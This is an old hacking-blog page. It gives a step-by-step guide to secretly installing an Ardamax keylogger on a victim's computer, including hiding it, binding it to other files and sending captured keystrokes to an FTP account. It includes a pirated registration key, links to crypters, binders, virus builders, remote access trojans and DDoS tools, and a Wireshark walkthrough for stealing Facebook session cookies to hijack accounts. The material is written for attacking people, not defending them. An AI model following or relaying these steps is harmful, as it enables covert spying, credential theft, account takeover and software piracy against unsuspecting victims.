Monday, 16 January 2012

How to use Keyloggers – Detailed Tutorial



This is a DETAILED tutorial to tell you all possible information about Keylogger & Keylogging .
Note-I highly recommend that you read this post completely since every single piece of information is important
1. What is a Keylogger?
A keylogger is also called a spysoftware is a small program that records each and every keystroke a user types on a specific computer’s keyboard. A keylogger program canb e installed or attached in computer just in a few seconds and once installed you are only a step away from getting the victim’s password.

2. How Keylogger works?
Once the keylogger is installed on a PC, it starts operating in the background (stealth mode) and captures every keystroke of the victim on that PC. Let’s take up a small example: The victim goes to http://www.gmail.com and types his “username” and the “password” in the respective fields to login. The keylogger silently records these keystrokes and stores them in the logs. These logs when opened up shows the captured “username” and “password” and will also tell you that they were typed in the gmail login page. Thus the keylogger loads upon every startup, runs in the background and captures each and every keystroke. Some keyloggers also give a screen-shot of Your computer background.

3-Types of Keyloggers.
1-Hardware Keylogger - A plug-in device or a hardware circuit can be used as keylogger tools. Either of the two can log to their internal memories all of a user’s keyboard activities.
2-Software Keylogger- The software keylogger needs to be installed on the Victims computer to work

4-Once I install the keylogger can the victim come to know about it’s presence?
No. The victim will never come to know about the presence of the keylogger on his/her computer. This is because, once installed the keylogger will run in total stealth mode. Unlike other programs it will never show up in start-menu, start-up, program files, add/remove programs and task manager. So the victim can no way identify it’s presence on his/her PC.But if the Victim is Wise he may run a system scan or he may also see the process then he rocks and you are fool

5- Can I be traced back if I install the keylogger on some other computer?

No, For a Man with no knowledge about computer and keylogger or even a man who know;s this cannot trace you back. But in my case I can trace keyloggers

6-Which keylogger is the best?

Number of keyloggers are available but the best I used till now for me is Ardamax Keylogger.

***9668;***9668;~~ARDAMAX TUTORIAL~~***9658;


I am using my virtual Os for Making this tutorial.

Serial
Name: ONY wuz here!
Serial: ABKRRPKWTLEFWCL

Download The Ardamax Keylogger 2.85
Code:

2-.Now right-hand click it and click ‘Enter registration key….

3-Enter the Name and password in the box fields

4.Once done click ‘Ok’ and you should get a pop-up saying ‘Registration code is accepted. Thank you for registration!

II. Creating the Keylogger Remote file:
1. Now your going to make the Keylogger Remote file (The thing you give to your victim). Click ‘Remote Installation…’,

click ‘Next’
2.Now,you should see this.

3.If you want to bind Keylogger Remote file with another application or file click the box that says ‘Append keylogger Remote file to file or another application’ and browse file or application that you want to bind it with.. I would prefer to skip this and bind the keylogger after creating the remote file.

4. Now click ‘Additional components’ and tick ‘Installation Package Bilder’ like done in the screenshot.

5.Now you should be at ‘Invisibility’, make sure all the boxes are ticked, then click ‘Next’.

6. Now you should be at ‘Security’, click ‘Enable’ and put your password (it can be any password you like, make it something easy so you can remember). Once done, make sure all the boxes are ticked and click ‘Next’.. Or else SkIp this also

7-untik the update optiong

8. Ok, you should now be at ‘Options’, use setting like done in screenshots.You can also select it destruction date

9. Ok, now you should be at ‘Control’, click the box that says ‘Send logs every’, now make it so it sends logs every 20 minutes, then where it says ‘Delivery’, un-tick ‘Email’ and tick ‘FTP’, then where it says ‘Include’ un-tick ‘Screenshots’, now un-tick the box where it says ‘Send only if log size exceeds’, once thats done, it should all look like it does in this screenshot:

10. Now you should be at ‘FTP’, create a free account at http://www.drivehq.com/secure/FreeSignup…om=storage, then make sure your at ‘Online Storage’, then make a new folder called: Logs (this is where the logs are sent to when you keylogg someone), Now on your FTP on Ardamax Keylogger, where it says ‘FTP Host:’, put this:
Now where it says ‘Remote Folder:’, put this: Logs
Now where it says ‘Userame:’ and ‘Password:’, put your DriveHQ username and password, then it should look something like this:


Now Click ‘Test’ and it should pop up like this

If not then see if the password and username is right.

Once done, do NOT change your DriveHQ password or rename/delete the folder called ‘Logs’, if you do, the logs will not come through.

11. You should now be at ‘Control’, un-tick ‘Enable Screenshots Capturing’ then click ‘Next’.

12. Now you can change name and icon your Keylogger Engine as you want it to look like.

ust click ‘Finish’.
13.After you click ‘Finish’ you should see this:


Now Your Remote File Is Created

Happy hacking....

BitDefender Internet Security 2011 Free 365 Days License!



Its Legal...Not cracked Version.


How do I get a FREE BitDefender Internet Security 2011 365 Days License?

Simple! Follow these steps:

  • Go to the following page and fill in your e-mail address and the image CAPTCHA:


Do not worry as the interface is in German language, but anyways enter your details!


  • You will instantly recieve an email from BitDefender in your inbox.

  • Download BitDefender Internet Security 2011 from the following options: 





    1. Online Installer: http://download.bitdefender.com/windows/installer/en-us/bitdefender_isecurity.exe
    2. 32bit Offline Installer:http://download.bitdefender.com/windows/desktop/i_security/2012/en-us/bitdefender_is_2012_32b.exe
    3. 64bit Offline Installer:http://download.bitdefender.com/windows/desktop/i_security/2012/en-us/bitdefender_is_2012_64b.exe

    Install and use your key!

    Guys open those with caution those are not my tool so maybe some of them is backdoor Always use sandboxie





    Crypter's


    1. Deh Crypter






    Download link: http:/ /adf. ly/ETey

    2. JCrypter




    Download link: http: //adf . ly/ETez

    3. Refruncy Crypter




    Download link: clik here

    4. Daemon Crypt v2.0






    Download link: click here

    5. El Bruto Crypter V2






    Download link: click here

    Binders






    6. bl0b Binder + Unique Stub Generator






    Download link: http:/ / adf. l y/EThM

    7. vBinder






    Download link: http:// adf. ly/EThN

    8. KBW Binder






    Download link: http:// adf. ly/EThO

    9. YAB Binder V2.01






    Download link: http:/ adf .ly/EThP

    10. EES Binder V1.0






    Download link: http:// adf. ly/EThQ

    Virus Builder




    11. Dr. VBS Virus Maker






    Download link: http:// adf. ly/ETl0

    12. Vbswg 2 Beta






    Download link: http:// adf .ly/ETl1

    13. Virus-O-Matic Virus Maker






    Download link: http:/ / adf .ly/ETl2

    14. Kill Switch v1.0






    Download link: http:// adf .ly/ETl3

    15. Hell P2P Worm Generator v1.8






    Download link: http:// adf. ly/ETl4
    RAT's




    16. Cerberus 1.03.4 BETA






    Download link: http:/ /adf. ly/ETmP

    17. Turkojan 4 GOLD






    Download link: http:/ adf .ly/ETmQ

    18. Apocalypse 1.4.4






    Download link: http:// adf. ly/ETmR



    19. Poison Ivy 2.3.2






    Download link: http:// adf. ly/ETmS

    20. Bifrost v1.2






    Download link: http:/ /adf. ly/ETmT

    Ddosers


    21. rDoS




    Download link: http:// adf. ly/EToQ

    22. zDoS






    Download link: http: / adf. ly/EToR

    23. SYN Flood






    Download link: http:// adf. ly/EToS

    24. RPCNuke 1.0






    Download link: http:// adf .ly/EToT

    25. Rocket v1.0






    Download link: http:/ / adf .ly/EToU

    26. Panther Mode 2








    Download link: http:// adf .ly/EToV


    :D

    Hack a FaCeBoOk aCCoUnT with cookie StEaLiNg or session hijacking

    Hey!! This Is the hanzla and in this tutorial ill be teaching you how to hack a facebook account with cookie stealing or session hijacking.
    The cookie which facebook uses to authenticate it's users is called "Datr", If an attacker can get hold of your authentication cookies, All he needs to do is to inject those cookies in his browser and he will gain access to your account. This is how a facebook authentication cookie looks like:


    Cookie: datr=1276721606-b7f94f977295759399293c5b0767618dc02111ede159a827030fc;


    How To Steal Facebook Session Cookies And Hijack An Account? 

    An attacker can use variety of methods in order to steal your facebook authentication cookies depending upon the network he is on, If an attacker is on a hub based network he would just sniff traffic with any packet sniffer and gain access to victims account.

    If an attacker is on a Switch based network he would use an ARP Poisoning request to capture authentication cookies, If an attacker is on a wireless network he just needs to use a simple tool called firesheep in order to capture authentication cookie and gain access to victims account.

    In the example below I will be explaining how an attacker can capture your authentication cookies and hack your facebook account with wireshark.

    Step 1 - First of all download wireshark from here and install it.

    Step 2 - Next open up wireshark click on capture and then click on interfaces.

    Step 3 - Next choose the appropriate interface and click on start.






    Step 4 - Continue sniffing for around 10 minutes.

    Step 5 - After 10minutes stop the packet sniffing by going to the capture menu and clicking on Stop.

    Step 6 - Next set the filter to http.cookie contains datr at top left, This filter will search for all the http cookies with the name datr, And datr as we know is the name of the facebook authentication cookie.






    Step 7 -  Next right click on it and goto Copy - Bytes - Printable Text only.

    Step 8 - Next you’ll want to open up firefox. You’ll need both Greasemonkey and thecookieinjector script. Now open up Facebook.com and make sure that you are not logged in.

    Step 9- Press Alt C to bring up the cookie injector, Simply paste in the cookie value into it.






    Step 10 -  Now refresh your page and hurrrrrryyy!!!!!! you are logged in to the victims facebook account.


    Note: This Attack will only work if victim is on a http:// connection and even on https:// if end to end encryption is not enabled.